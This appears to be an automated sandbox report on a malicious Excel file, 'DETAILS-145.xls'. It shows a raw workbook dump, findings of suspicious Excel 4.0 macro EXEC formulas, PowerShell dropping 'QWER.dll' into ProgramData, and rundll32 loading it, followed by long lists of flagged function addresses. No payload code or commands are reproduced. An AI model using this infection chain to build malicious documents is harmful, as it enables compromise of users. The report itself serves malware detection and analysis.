Source: DETAILS-145.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: DETAILS-145.xls Initial sample: EXEC
Source: DETAILS-145.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00179700 9_2_00179700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00185CF9 9_2_00185CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00185040 9_2_00185040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018109E 9_2_0018109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176083 9_2_00176083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001770ED 9_2_001770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017911A 9_2_0017911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F154 9_2_0017F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018A156 9_2_0018A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00189186 9_2_00189186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001841A7 9_2_001841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017E243 9_2_0017E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018026B 9_2_0018026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018129C 9_2_0018129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017C309 9_2_0017C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018B391 9_2_0018B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018C38F 9_2_0018C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D3C8 9_2_0018D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017B41A 9_2_0017B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018A429 9_2_0018A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018542E 9_2_0018542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019146E 9_2_0019146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018E498 9_2_0018E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001804B8 9_2_001804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001874DD 9_2_001874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001904DE 9_2_001904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001864F1 9_2_001864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001744FA 9_2_001744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183512 9_2_00183512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F58F 9_2_0017F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001845CD 9_2_001845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018561F 9_2_0018561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018363D 9_2_0018363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00178650 9_2_00178650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00193672 9_2_00193672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017472E 9_2_0017472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00182753 9_2_00182753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017777B 9_2_0017777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00172830 9_2_00172830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00181831 9_2_00181831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017B821 9_2_0017B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017C850 9_2_0017C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00186864 9_2_00186864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017E86A 9_2_0017E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00190867 9_2_00190867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001768DE 9_2_001768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D8D7 9_2_0018D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001788F4 9_2_001788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F93D 9_2_0017F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00171950 9_2_00171950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017194C 9_2_0017194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00180946 9_2_00180946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00191993 9_2_00191993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018C9A9 9_2_0018C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001899AA 9_2_001899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176A1F 9_2_00176A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017CA43 9_2_0017CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00179A7D 9_2_00179A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00191B54 9_2_00191B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00184B56 9_2_00184B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017BB4B 9_2_0017BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017AB66 9_2_0017AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00177B82 9_2_00177B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00187BCA 9_2_00187BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EBFF 9_2_0018EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00182BF6 9_2_00182BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176C29 9_2_00176C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017EC9B 9_2_0017EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018CC89 9_2_0018CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018ACD3 9_2_0018ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017BD0F 9_2_0017BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00180D33 9_2_00180D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00190D5B 9_2_00190D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183D41 9_2_00183D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00188D71 9_2_00188D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00178D95 9_2_00178D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017FD8C 9_2_0017FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EE94 9_2_0018EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017AE9A 9_2_0017AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018BE8C 9_2_0018BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176ED6 9_2_00176ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018FF31 9_2_0018FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00171F9B 9_2_00171F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173FB8 9_2_00173FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00172FA1 9_2_00172FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017CFCE 9_2_0017CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023BE8C 10_2_0023BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023EE94 10_2_0023EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022EC9B 10_2_0022EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023E498 10_2_0023E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002270ED 10_2_002270ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00235CF9 10_2_00235CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002374DD 10_2_002374DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F93D 10_2_0022F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229700 10_2_00229700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00233512 10_2_00233512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00241B54 10_2_00241B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023B391 10_2_0023B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228D95 10_2_00228D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022B821 10_2_0022B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023A429 10_2_0023A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226C29 10_2_00226C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023542E 10_2_0023542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00231831 10_2_00231831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222830 10_2_00222830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023363D 10_2_0023363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022B41A 10_2_0022B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023561F 10_2_0023561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226A1F 10_2_00226A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00240867 10_2_00240867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00236864 10_2_00236864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022E86A 10_2_0022E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023026B 10_2_0023026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0024146E 10_2_0024146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00243672 10_2_00243672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229A7D 10_2_00229A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022CA43 10_2_0022CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022E243 10_2_0022E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00235040 10_2_00235040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C850 10_2_0022C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228650 10_2_00228650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002304B8 10_2_002304B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226083 10_2_00226083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023CC89 10_2_0023CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AE9A 10_2_0022AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023109E 10_2_0023109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023129C 10_2_0023129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002364F1 10_2_002364F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002288F4 10_2_002288F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002244FA 10_2_002244FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023ACD3 10_2_0023ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226ED6 10_2_00226ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D8D7 10_2_0023D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002404DE 10_2_002404DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002268DE 10_2_002268DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022472E 10_2_0022472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230D33 10_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023FF31 10_2_0023FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C309 10_2_0022C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BD0F 10_2_0022BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022911A 10_2_0022911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AB66 10_2_0022AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00238D71 10_2_00238D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022777B 10_2_0022777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00233D41 10_2_00233D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230946 10_2_00230946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BB4B 10_2_0022BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022194C 10_2_0022194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00232753 10_2_00232753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221950 10_2_00221950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023A156 10_2_0023A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00234B56 10_2_00234B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F154 10_2_0022F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00240D5B 10_2_00240D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222FA1 10_2_00222FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002341A7 10_2_002341A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002399AA 10_2_002399AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023C9A9 10_2_0023C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00223FB8 10_2_00223FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227B82 10_2_00227B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00239186 10_2_00239186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023C38F 10_2_0023C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F58F 10_2_0022F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022FD8C 10_2_0022FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00241993 10_2_00241993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221F9B 10_2_00221F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00232BF6 10_2_00232BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023EBFF 10_2_0023EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00237BCA 10_2_00237BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D3C8 10_2_0023D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022CFCE 10_2_0022CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002345CD 10_2_002345CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B9700 11_2_001B9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C5CF9 11_2_001C5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C5040 11_2_001C5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C109E 11_2_001C109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6083 11_2_001B6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B70ED 11_2_001B70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B911A 11_2_001B911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CA156 11_2_001CA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF154 11_2_001BF154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C9186 11_2_001C9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C41A7 11_2_001C41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BE243 11_2_001BE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C026B 11_2_001C026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C129C 11_2_001C129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BC309 11_2_001BC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CB391 11_2_001CB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CC38F 11_2_001CC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD3C8 11_2_001CD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BB41A 11_2_001BB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C542E 11_2_001C542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CA429 11_2_001CA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D146E 11_2_001D146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CE498 11_2_001CE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C04B8 11_2_001C04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C74DD 11_2_001C74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D04DE 11_2_001D04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B44FA 11_2_001B44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C64F1 11_2_001C64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3512 11_2_001C3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF58F 11_2_001BF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C45CD 11_2_001C45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C561F 11_2_001C561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C363D 11_2_001C363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B8650 11_2_001B8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D3672 11_2_001D3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B472E 11_2_001B472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C2753 11_2_001C2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B777B 11_2_001B777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B2830 11_2_001B2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C1831 11_2_001C1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BB821 11_2_001BB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BC850 11_2_001BC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BE86A 11_2_001BE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C6864 11_2_001C6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D0867 11_2_001D0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B68DE 11_2_001B68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD8D7 11_2_001CD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B88F4 11_2_001B88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF93D 11_2_001BF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1950 11_2_001B1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B194C 11_2_001B194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0946 11_2_001C0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D1993 11_2_001D1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CC9A9 11_2_001CC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C99AA 11_2_001C99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6A1F 11_2_001B6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BCA43 11_2_001BCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B9A7D 11_2_001B9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D1B54 11_2_001D1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C4B56 11_2_001C4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BBB4B 11_2_001BBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BAB66 11_2_001BAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B7B82 11_2_001B7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C7BCA 11_2_001C7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEBFF 11_2_001CEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C2BF6 11_2_001C2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6C29 11_2_001B6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BEC9B 11_2_001BEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CCC89 11_2_001CCC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CACD3 11_2_001CACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BBD0F 11_2_001BBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C0D33 11_2_001C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001D0D5B 11_2_001D0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C3D41 11_2_001C3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C8D71 11_2_001C8D71
